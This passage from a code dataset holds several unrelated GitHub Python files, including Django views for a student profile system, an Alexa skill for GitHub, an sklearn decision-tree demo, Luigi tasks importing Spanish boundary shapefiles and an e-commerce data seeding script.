= '0000'\n if last_id == '0000':\n return 'AAAA'\n carry = 0\n new_id = ''\n if last_id[3] == 'Z':\n carry = 1\n new_id += 'A'\n else:\n new_id += chr(ord(last_id[3]) + 1)\n i = 2\n while i >= 0 and carry == 1:\n if last_id[i] == 'Z':\n carry = 1\n new_id += 'A'\n else:\n carry = 0\n new_id += chr(ord(last_id[i]) + 1)\n i -= 1\n while i >= 0:\n new_id += last_id[i]\n i -= 1\n return new_id[::-1]\n \n# Create your views here.\n\n\n@login_required\n@govt_official_required # <-- here!\ndef home(request):\n q = request.GET.get('q')\n if q:\n colleges = College.objects.filter(\n Q(college_id__icontains=q) | Q(college_name__icontains=q)\n )\n else:\n colleges = College.objects.all()\n return render(request, 'government/home.html', {'colleges': colleges})\n\n\n@login_required\n@govt_official_required # <-- here!\ndef viewStudentsListByCollege(request, college_id):\n q = request.GET.get('q')\n college = College.objects.get(college_id=college_id)\n if q:\n students = Student.objects.filter(\n Q(college_id=college.id) & (\n Q(registration_no__icontains=q) | \n Q(name__icontains=q)\n ))\n else:\n students = Student.objects.filter(college_id=college.id)\n context = {'students': students, 'college_id': college_id, 'college_name': college.college_name}\n return render(request, 'government/view-students-list.html', context=context)\n\n\n\ndef loginPage(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n try:\n user = CustomUser.objects.get(username=username)\n if user.is_govt_official:\n user = authenticate(\n request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('govt-official-home')\n else:\n messages.info(request, 'Username or password is incorrect')\n else:\n messages.info(request, 'You are not a govt official')\n except:\n messages.info(request, 'User not found')\n\n return render(request, 'government/login.html')\n\n\ndef logoutPage(request):\n logout(request)\n return redirect('govt-official-login')\n\n\ndef registerGovtOfficialPage(request):\n form = UserRegistrationForm()\n if request.method == 'POST':\n form = UserRegistrationForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_govt_official = True\n user.save()\n login(request, user)\n return redirect('govt-official-home')\n\n return render(request, 'government/register.html', {'form': form})\n\n\n@login_required\n@govt_official_required # <-- here!\ndef registerCollegeAndHead(request):\n cid = generateId()\n form1 = UserRegistrationForm()\n form2 = CollegeRegistrationForm()\n\n context = {'form1': form1, 'form2': form2, 'collegeID': cid}\n if request.method == 'POST':\n post1 = request.POST.copy()\n post2 = request.POST.copy()\n post1.pop('college_name')\n post2.pop('username')\n post2.pop('first_name')\n post2.pop('last_name')\n post2.pop('password1')\n post2.pop('password2')\n form1 = UserRegistrationForm(post1)\n form2 = CollegeRegistrationForm(post2)\n if form1.is_valid(): # <-- here!\n userInstance = form1.save(commit=False)\n # college head registered succesfully\n userInstance.is_college_head = True\n userInstance.save()\n collegehead = CustomUser.objects.get(username=userInstance.username)\n college = form2.save(commit=False)\n college.college_head = collegehead\n college.college_id = cid\n\n if form2.is_valid():\n college.save()\n return redirect('govt-official-home')\n else:\n messages.info(request, 'College not registered')\n else:\n messages.info(request, 'College head not registered')\n\n return render(request, 'government/register-college-and-head.html', context=context)","repo_name":"csgeeek/student-profile-system","sub_path":"government/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71744868854","text":"\nfrom __future__ import print_function\nfrom github import Github\n\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': \"SessionSpeechlet - \" + title,\n 'content': \"SessionSpeechlet - \" + output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_directive_response(directives):\n return {\n 'shouldEndSession': False,\n 'directives': [directives]\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome\"\n speech_output = \"I connect to your git hub account. \" \\\n \"ask me to list your repos, \" \\\n \"or what's new.\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please ask what's new.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"OK\"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef get_notifications(intent, session):\n \"\"\" queries github for recent events on your account\n \"\"\"\n\n card_title = intent['name']\n session_attributes = {}\n reprompt_text = ''\n should_end_session = True\n\n g = Github(session['user']['accessToken'])\n events = g.get_user().get_notifications()\n num_events = 0\n event_strings = []\n for evt in events:\n num_events += 1\n if num_events < 5:\n event_strings.append(evt.subject.type+' for '+evt.repository.name+', '+evt.subject.title)\n\n if num_events > 0:\n speech_output = \\\n 'You have {0} notifications.'.format(num_events) + ', here are the first 5. ' + \\\n ', '.join(event_strings)\n reprompt_text = ''\n else:\n speech_output = \"Nothing new since last time you asked.\"\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef get_repos(intent, session):\n session_attributes = {}\n reprompt_text = None\n\n g = Github(session['user']['accessToken'])\n repos = g.get_user().get_repos(sort='pushed')\n index = 0\n if 'attributes' in session and 'index' in session['attributes']:\n index = int(session['attributes']['index'])\n num_repos = 0\n repo_strings = []\n for rep in repos:\n num_repos += 1\n if num_repos >= index and num_repos < (index + 4):\n repo_strings.append(str(num_repos) + ', ' + rep.name)\n # TODO: handle end of list, by ending the session\n if num_repos > 0:\n if index == 0:\n speech_output = 'You have {0} repos. The top 3 are '.format(num_repos)\n speech_output = speech_output + \\\n ','.join(repo_strings) + ', Select a number of say \"more\".'\n reprompt_text = 'Should I list more?'\n should_end_session = False\n session_attributes['index'] = index + 5\n session_attributes['intent'] = 'GetRepos'\n else:\n speech_output = \"You don't have any repos in this account.\"\n should_end_session = True\n\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef get_acct_info(intent, session):\n session_attributes = {}\n reprompt_text = None\n should_end_session = True\n\n g = Github(session['user']['accessToken'])\n u = g.get_user()\n speech_output = \\\n 'You are {0}. You have {1} public repose, {2} followers and are following {3}.'. \\\n format(u.name, u.public_repos, u.followers, u.following)\n\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef get_orgs(intent, session):\n session_attributes = {}\n reprompt_text = None\n should_end_session = True\n\n g = Github(session['user']['accessToken'])\n orgs = g.get_user().get_orgs()\n num_orgs = 0\n org_strings = []\n for org in orgs:\n num_orgs += 1\n org_strings.append(org.url[org.url.rfind('/')+1:])\n if num_orgs > 0:\n speech_output = \\\n 'You belong to these organizations. ' + ','.join(org_strings)\n else:\n speech_output = \"You don't have any organizations in this account.\"\n\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef merge_pr(intent, session, dialog_state):\n filled_slots = delegate_slot_collection(intent, dialog_state)\n if intent != filled_slots:\n return filled_slots\n\n session_attributes = {}\n reprompt_text = None\n should_end_session = True\n\n repo_name = filled_slots['REPONAME']['value']\n pr_number = filled_slots['PRNUMBER']['value']\n\n g = Github(session['user']['accessToken'])\n repo = g.get_repo(repo_name)\n pr = repo.get_pull(pr_number)\n if pr.mergable():\n pr.merge()\n speech_output = 'pull request ' + pr_number + ' merged.'\n else:\n speech_output = 'pull request ' + pr_number + ' cannot be merged.'\n\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef delegate_slot_collection(intent, dialog_state):\n print('dialog state = '+dialog_state)\n if dialog_state == 'STARTED':\n return build_response({}, build_directive_response({'type': 'Dialog.Delegate'}))\n # emit(':delegate', intent)\n elif dialog_state != 'COMPLETED':\n return build_response({}, build_directive_response({'type': 'Dialog.Delegate'}))\n # emit(':delegate')\n else:\n return intent\n\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\n \"on_session_started requestId=\" +\n session_started_request['requestId'] +\n \", sessionId=\" + session['sessionId']\n )\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"AMAZON.YesIntent\":\n if session['attributes']['intent'] == 'GetRepos':\n return get_repos(intent, session)\n elif intent_name == \"GetNotifications\":\n return get_notifications(intent, session)\n elif intent_name == \"GetRepos\":\n return get_repos(intent, session)\n elif intent_name == \"GetOrganizations\":\n return get_orgs(intent, session)\n elif intent_name == \"GetAcctInfo\":\n return get_acct_info(intent, session)\n elif intent_name == \"MergePullRequest\":\n return merge_pr(intent, session, intent_request.get('dialogState', None))\n elif intent_name == \"AMAZON.NoIntent\":\n return handle_session_end_request()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n # if no amazon token, return a LinkAccount card\n\n if 'accessToken' not in event['session']['user']:\n return build_response({}, {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': 'to start using this skill, please use the companion app to authenticate on github',\n },\n 'card': {\n 'type': 'LinkAccount',\n },\n 'shouldEndSession': False\n })\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']}, event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n","repo_name":"dkavanagh/skill-for-github","sub_path":"githubskill.py","file_name":"githubskill.py","file_ext":"py","file_size_in_byte":10790,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"20835917258","text":"from sklearn import datasets\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\niris = datasets.load_iris()\r\nx = pd.DataFrame(iris['data'], columns=iris['feature_names'])\r\nprint(\"target_names: \"+str(iris['target_names']))\r\ny = pd.DataFrame(iris['target'], columns=['target'])\r\niris_data = pd.concat([x,y], axis=1)\r\niris_data = iris_data[['sepal length (cm)','petal length (cm)','target']]\r\niris_data = iris_data[iris_data['target'].isin([0,1])]\r\niris_data.head(3)\r\n\r\n\r\n# split data\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n iris_data[['sepal length (cm)','petal length (cm)']], iris_data[['target']], test_size=0.3, random_state=0)\r\n \r\nfrom sklearn.tree import DecisionTreeClassifier\r\ntree = DecisionTreeClassifier(criterion = 'entropy', random_state=0, max_depth=2)\r\ntree.fit(X_train,y_train)\r\n\r\ntree.predict(X_test)\r\ntree.score(X_test,y_test['target'])\r\n\r\nfrom matplotlib.colors import ListedColormap\r\n\r\ndef plot_decision_regions(X, y, classifier, test_idx=None, resolution=0.02):\r\n\r\n # setup marker generator and color map\r\n markers = ('s', 'x', 'o', '^', 'v')\r\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\r\n cmap = ListedColormap(colors[:len(np.unique(y))])\r\n\r\n # plot the decision surface\r\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\r\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\r\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\r\n np.arange(x2_min, x2_max, resolution))\r\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\r\n Z = Z.reshape(xx1.shape)\r\n plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)\r\n plt.xlim(xx1.min(), xx1.max())\r\n plt.ylim(xx2.min(), xx2.max())\r\n\r\n for idx, cl in enumerate(np.unique(y)):\r\n plt.scatter(x=X[y == cl, 0], \r\n y=X[y == cl, 1],\r\n alpha=0.6, \r\n c=cmap(idx),\r\n edgecolor='black',\r\n marker=markers[idx], \r\n label=cl)\r\n\r\n # highlight test samples\r\n if test_idx:\r\n # plot all samples\r\n if not versiontuple(np.__version__) >= versiontuple('1.9.0'):\r\n X_test, y_test = X[list(test_idx), :], y[list(test_idx)]\r\n warnings.warn('Please update to NumPy 1.9.0 or newer')\r\n else:\r\n X_test, y_test = X[test_idx, :], y[test_idx]\r\n\r\n plt.scatter(X_test[:, 0],\r\n X_test[:, 1],\r\n c='',\r\n alpha=1.0,\r\n edgecolor='black',\r\n linewidths=1,\r\n marker='o',\r\n s=55, label='test set')\r\n \r\nplot_decision_regions(X_train.values, y_train['target'].values, classifier=tree)\r\nplt.xlabel('petal length [standardized]')\r\nplt.ylabel('petal width [standardized]')\r\nplt.legend(loc='upper left')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\nfrom sklearn.tree import export_graphviz\r\nexport_graphviz(tree, out_file='tree.dot', feature_names=['sepal length (cm)','petal length (cm)']) \r\n\r\n# convert .dot to .png from DOS\r\n# dot -Tpng tree.dot -o tree.png\r\n ","repo_name":"Mowd/DataScience","sub_path":"Day2/decisionTree_test_split.py","file_name":"decisionTree_test_split.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69827849974","text":"import os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__),'modules'))\nsys.path.append(os.path.join(os.path.dirname(__file__),'PhotoEdit'))\nimport readConfig\nimport AfterShot\nimport output_redirect\nimport tkinter as tk\nfrom PIL import Image,ImageTk\n\n\nclass SdxGui:\n def __init__(self):\n config=readConfig.readConfig(os.path.join(os.path.dirname(__file__),'PhotoEdit','config','PhotoEdit.config'))\n self.logo_dir=config['logo及二维码文件夹']\n\n def go(self,pic_dir='e:\\\\temp\\\\sdx\\\\to_mark',logo_type='xiong_and_zimu',thresh_hold=0.42,new_size=2400,mode='gui'):\n window=tk.Tk()\n window.title('树带熊给照片打标')\n window.geometry('300x300')\n\n logo=Image.open(os.path.join(self.logo_dir,'xiong_and_zimu.jpg'))\n logo=logo.resize((100,100))\n logo_cover=ImageTk.PhotoImage(logo)\n lb_logo=tk.Label(window,image=logo_cover)\n lb_logo.pack()\n\n lb_pos=tk.Label(window,text='logo位置',bg='#FFFFEE',font=('黑体',12),width=500,height=2)\n lb_pos.pack()\n\n pos = tk.StringVar() # 定义一个var用来将radiobutton的值和Label的值联系在一起.\n pos.set('ru')\n pos1= tk.Radiobutton(window, text='右上角', variable=pos, value='ru')\n pos1.pack()\n pos2 = tk.Radiobutton(window, text='右下角', variable=pos, value='rb')\n pos2.pack()\n\n\n msg_box=tk.Text(window) \n def put_mark():\n p=AfterShot.Photo()\n # p.put_mark(pic='q:\\\\temp\\\\sdx\\\\DSC_0659.jpg',logo_type='txt')\n # logo_type参数:xiong 或 zimu 或 xiong_and_zimu\n my_out=output_redirect.myStdout(msg_box)\n p.group_mark(pic_dir=pic_dir,logo_type=logo_type,new_size=new_size,pos=pos.get(),thresh_hold=thresh_hold,mode=mode,msg_box=msg_box)\n my_out.restoreStd()\n\n btn=tk.Button(window,text='给照片添加水印',font=('楷体',12),command=put_mark) \n btn.pack()\n msg_box.pack()\n\n window.mainloop()\n\n\n\n\nif __name__=='__main__':\n gui=SdxGui()\n gui.go(pic_dir='d:\\\\temp\\\\sdx\\\\to_mark',logo_type='xiong_and_zimu',thresh_hold=0.42,new_size=2400,mode='gui')\n","repo_name":"jack911jie/sdx","sub_path":"sdx_gui.py","file_name":"sdx_gui.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"472939967","text":"from scompose.project import Project\n\ndef main(args, parser, extra):\n '''Build or rebuild containers\n\n Containers are built once and then named as _,\n e.g. `folder_db`. If a Singularity recipe changes for a container folder,\n you can run \"singularity-compose build\" to rebuild it.\n '''\n # Initialize the project\n project = Project(filename=args.file,\n name=args.project_name,\n env_file=args.env_file)\n\n # Builds any containers into folders\n project.build(args.names)\n","repo_name":"naveen584/singularity-compose","sub_path":"scompose/client/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"13299051041","text":"# flames.py\r\n\r\nimport upygame as pygame\r\nimport urandom as random\r\n\r\nclass Flames:\r\n def __init__(self, x, y, speed):\r\n self.x = x\r\n self.y = y\r\n self.startY = y\r\n self.speed = speed\r\n self.colour = random.getrandbits(1)\r\n if self.colour == 0:\r\n self.colour = 1\r\n else:\r\n self.colour = 10\r\n \r\n def update(self, x, y):\r\n self.y += self.speed\r\n \r\n if abs(self.startY - self.y) > 15:\r\n self.y = y\r\n self.startY = y\r\n \r\n # Change speed and x pos\r\n self.x = x + random.getrandbits(3)\r\n self.speed = random.getrandbits(3)\r\n if self.speed < 3:\r\n self.speed = 3\r\n \r\n # Change colour\r\n self.colour = random.getrandbits(1)\r\n if self.colour == 0:\r\n self.colour = 1\r\n else:\r\n self.colour = 10\r\n \r\n def draw (self, shakeX):\r\n pygame.draw.pixel(self.x + shakeX + 4, self.y, self.colour)","repo_name":"jvdw008/r0xitto","sub_path":"flames.py","file_name":"flames.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39734587663","text":"# -*- coding: utf-8 -*-\n# #http://centrodedescargas.cnig.es/CentroDescargas/inicio.do\n\nfrom luigi import Task, Parameter, LocalTarget, WrapperTask\nfrom tasks.util import (ColumnsTask, TableTask, shell, classpath,\n Shp2TempTableTask, current_session)\n\nfrom tasks.tags import SectionTags, SubsectionTags, UnitTags, LicenseTags\nfrom tasks.meta import OBSColumn, GEOM_REF\n\nfrom collections import OrderedDict\nimport os\n\n\nclass DownloadGeometry(Task):\n\n seq = Parameter()\n\n #http://centrodedescargas.cnig.es/CentroDescargas/downloadFile.do?seq=114023\n URL = 'http://centrodedescargas.cnig.es/CentroDescargas/downloadFile.do?seq={seq}'\n\n def run(self):\n self.output().makedirs()\n shell('wget -O {output}.zip {url}'.format(output=self.output().path,\n url=self.URL.format(seq=self.seq)))\n os.makedirs(self.output().path)\n shell('unzip -d {output} {output}.zip'.format(output=self.output().path))\n\n def output(self):\n return LocalTarget(os.path.join('tmp', classpath(self), self.seq))\n\n\nclass ImportGeometry(Shp2TempTableTask):\n\n resolution = Parameter()\n timestamp = Parameter()\n\n def requires(self):\n return DownloadGeometry(seq='114023')\n\n def input_shp(self):\n path = os.path.join('SIANE_CARTO_BASE_S_3M', 'anual', self.timestamp,\n 'SE89_3_ADMIN_{resolution}_A_X.shp'.format(\n resolution=self.resolution.upper()))\n return os.path.join(self.input().path, path)\n\n\nclass GeometryColumns(ColumnsTask):\n\n def version(self):\n return 3\n\n def requires(self):\n return {\n 'sections': SectionTags(),\n 'subsections': SubsectionTags(),\n }\n\n def columns(self):\n sections = self.input()['sections']\n subsections = self.input()['subsections']\n ccaa = OBSColumn(\n type='Geometry',\n name='Autonomous Community',\n weight=6,\n description='The first-level administrative subdivision of Spain. ',\n tags=[sections['spain'], subsections['boundary']],\n )\n prov = OBSColumn(\n type='Geometry',\n name='Province',\n weight=7,\n description='The second-level administrative subdivision of Spain, '\n 'used primarily as electoral districts and geographic '\n 'references. Provinces do not cross between autonomous '\n 'communities.',\n tags=[sections['spain'], subsections['boundary']],\n )\n muni = OBSColumn(\n type='Geometry',\n name='Municipality',\n weight=8,\n description='The lowest level of territorial organization in Spain. '\n 'Municipal boundaries do not cross between provinces. ',\n tags=[sections['spain'], subsections['boundary']],\n )\n return OrderedDict([\n ('ccaa', ccaa),\n ('prov', prov),\n ('muni', muni),\n ])\n\n\nclass GeomRefColumns(ColumnsTask):\n\n def version(self):\n return 1\n\n def requires(self):\n return GeometryColumns()\n\n def columns(self):\n cols = OrderedDict()\n session = current_session()\n for colname, coltarget in self.input().iteritems():\n cols['id_' + colname] = OBSColumn(\n type='Text',\n name='',\n weight=0,\n targets={coltarget: GEOM_REF},\n )\n return cols\n\n\nclass Geometry(TableTask):\n\n resolution = Parameter()\n timestamp = Parameter(default='20150101')\n\n def version(self):\n return 4\n\n def requires(self):\n return {\n 'geom_columns': GeometryColumns(),\n 'geomref_columns': GeomRefColumns(),\n 'data': ImportGeometry(resolution=self.resolution,\n timestamp=self.timestamp)\n }\n\n def timespan(self):\n return self.timestamp\n\n def columns(self):\n return OrderedDict([\n ('geom_ref', self.input()['geomref_columns']['id_' + self.resolution]),\n ('the_geom', self.input()['geom_columns'][self.resolution])\n ])\n\n def geom_ref_colname(self):\n if self.resolution.lower() == 'ccaa':\n return 'id_ccaa'\n elif self.resolution.lower() == 'prov':\n return 'id_prov'\n elif self.resolution.lower() == 'muni':\n return 'id_ine'\n else:\n raise 'Unknown resolution {resolution}'.format(resolution=self.resolution)\n\n def populate(self):\n session = current_session()\n query = 'INSERT INTO {output} ' \\\n 'SELECT {geom_ref_colname} geom_ref, wkb_geometry the_geom ' \\\n 'FROM {input}'.format(\n output=self.output().table,\n input=self.input()['data'].table,\n geom_ref_colname=self.geom_ref_colname())\n session.execute(query)\n\n\nclass AllGeometries(WrapperTask):\n\n def requires(self):\n for resolution in ('ccaa', 'muni', 'prov', ):\n yield Geometry(resolution=resolution)\n\n","repo_name":"stvno/bigmetadata","sub_path":"tasks/es/cnig.py","file_name":"cnig.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"38128210947","text":"import os\nimport sys\nimport argparse\nimport codecs\n\n# ninja/miscにパスを通す \nsys.path.append(os.path.join(os.path.dirname(__file__),'..','ninja','misc'))\nfrom ninja_syntax import Writer\n\nif __name__=='__main__':\n # 引数処理\n parser = argparse.ArgumentParser()\n parser.add_argument('output')\n args = parser.parse_args()\n\n with codecs.open(args.output, 'w', 'utf-8') as f:\n writer = Writer(f)\n\n writer.comment('ninjaの定数等を定義するファイル')\n writer.newline()\n\n # このリポジトリのルートディレクトリ\n root_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),'..'))\n \n writer.comment('テキストコンバーター')\n writer.variable(key='text_converter',value=os.path.join(root_dir, 'scripts', 'text_converter.py'))\n\n writer.comment('テキストマージャー')\n writer.variable(key='text_merger',value=os.path.join(root_dir, 'scripts', 'text_merger.py'))\n \n writer.comment('中間ディレクトリ')\n writer.variable(key='tmpdir',value=os.path.join(root_dir, 'build', 'tmp'))\n \n writer.comment('出力ディレクトリ')\n writer.variable(key='outdir',value=os.path.join(root_dir, 'build', 'out'))\n \n writer.comment('設定ファイル')\n writer.variable(key='setting_file',value=os.path.join(root_dir, 'data', 'setting.json'))\n ","repo_name":"towazumi/ninja_res_bld_sample","sub_path":"scripts/ninja_config_writer.py","file_name":"ninja_config_writer.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32094430831","text":"from datetime import datetime, timedelta\nfrom random import randint\nfrom models.models import Category, Product, Sale, Inventory, InventoryChangeLog\nfrom db.database import SessionLocal\n\nDATABASE_URL = \"sqlite:///_ecommerce.db\"\n\ndb = SessionLocal()\n\n\ncategories_data = [\n {\"name\": \"electronics\"},\n {\"name\": \"furniture\"},\n {\"name\": \"cars\"},\n {\"name\": \"kitchen\"},\n # Add more category data if needed\n]\n\n# Sample data for products\nproducts_data = [\n {\n \"name\": \"Iphone\",\n \"description\": \"A premium quality mobile phone\",\n \"price\": 200000.99,\n \"category_id\": 1,\n },\n {\n \"name\": \"Bed\",\n \"description\": \"Gives uninterrupted sleep\",\n \"price\": 15000.00,\n \"category_id\": 2,\n },\n {\n \"name\": \"Refrigerator\",\n \"description\": \"A high quality cooling machine\",\n \"price\": 20999.99,\n \"category_id\": 1,\n },\n {\n \"name\": \"Audi A6\",\n \"description\": \"A world class car\",\n \"price\": 250000.00,\n \"category_id\": 3,\n },\n {\n \"name\": \"Sofa Set\",\n \"description\": \"A world class sofa set\",\n \"price\": 10000.00,\n \"category_id\": 2,\n },\n {\n \"name\": \"Oven\",\n \"description\": \"A high quality oven\",\n \"price\": 22222.00,\n \"category_id\": 4,\n },\n # Add more product data if needed\n]\n\ndb.bulk_save_objects([Category(**data) for data in categories_data])\ndb.commit()\n\ndb.bulk_save_objects([Product(**data) for data in products_data])\ndb.commit()\n\nsales_data = []\n\nstart_date = datetime(2021, 8, 1)\nend_date = datetime(2022, 11, 30)\n\nwhile start_date <= end_date:\n for product in db.query(Product).all():\n quantity_sold = randint(1, 10)\n\n hours = randint(0, 23)\n minutes = randint(0, 59)\n\n sale_timestamp = datetime(\n start_date.year, start_date.month, start_date.day, hours, minutes\n )\n\n sale = Sale(\n product_id=product.id,\n sale_timestamp=sale_timestamp,\n quantity_sold=quantity_sold,\n )\n sales_data.append(sale)\n start_date += timedelta(days=1)\n\ninventory_data = []\n\nfor product in db.query(Product).all():\n initial_stock = randint(20, 100)\n low_stock_alert_threshold = 10\n inventory = Inventory(\n product_id=product.id,\n current_stock=initial_stock,\n low_stock_alert_threshold=low_stock_alert_threshold,\n )\n inventory_data.append(inventory)\n\n\ninventory_change_logs_data = []\nstart_date = datetime(2021, 8, 1)\n\nfor product in db.query(Product).all():\n for _ in range(5):\n quantity_change = randint(0, 50)\n new_quantity = (\n product.inventory[0].current_stock + quantity_change\n if product.inventory\n else quantity_change\n )\n timestamp = datetime(2022, randint(1, 12), randint(1, 30), hours, minutes)\n\n change_log = InventoryChangeLog(\n product_id=product.id,\n quantity_change=quantity_change,\n new_quantity=new_quantity,\n timestamp=timestamp,\n )\n inventory_change_logs_data.append(change_log)\n\n\ndef populate_database():\n try:\n db.bulk_save_objects(sales_data)\n\n db.bulk_save_objects(inventory_data)\n\n db.bulk_save_objects(inventory_change_logs_data)\n\n db.commit()\n print(\"Sample data has been inserted into the database.\")\n except Exception as e:\n db.rollback()\n print(\"Error:\", str(e))\n finally:\n db.close()\n\n\nif __name__ == \"__main__\":\n populate_database()\n","repo_name":"Adan-Asim/E-commerce-Admin-App-Backend","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8770605510","text":"#!/usr/bin/python3\n\"\"\"Unittest for rectangle.py\n\"\"\"\nimport unittest\nimport io\nimport sys\nfrom models.base import Base\nfrom models.rectangle import Rectangle\n\n\nclass TestRectangle(unittest.TestCase):\n \"\"\"Testing class for Rectangle\n \"\"\"\n def setUp(self):\n \"\"\"Setup actions\n \"\"\"\n Base._Base__nb_objects = 0\n\n def test_id(self):\n \"\"\"Testing id setting\n \"\"\"\n r1 = Rectangle(10, 2)\n self.assertEqual(r1.id, 1)\n r2 = Rectangle(2, 10)\n self.assertEqual(r2.id, 2)\n r3 = Rectangle(10, 2, 0, 0, 12)\n self.assertEqual(r3.id, 12)\n r4 = Rectangle(1, 1, 1, 1, \"Bella\")\n self.assertEqual(r4.id, \"Bella\")\n\n def test_values(self):\n \"\"\"Testing input validation\n \"\"\"\n r4 = Rectangle(10, 2)\n with self.assertRaises(TypeError):\n r4.x = {}\n with self.assertRaises(TypeError):\n r4.y = True\n with self.assertRaises(TypeError):\n r4.height = True\n with self.assertRaises(TypeError):\n r4.x = True\n with self.assertRaises(TypeError):\n r4.width = True\n with self.assertRaises(TypeError):\n r5 = Rectangle(\"2\", 10)\n r6 = Rectangle(10, 2)\n with self.assertRaises(ValueError):\n r6.width = -10\n with self.assertRaises(ValueError):\n r6.height = -10\n with self.assertRaises(ValueError):\n r6.y = -3\n with self.assertRaises(ValueError):\n r6.x = -3\n with self.assertRaises(ValueError):\n r6.width = 0\n with 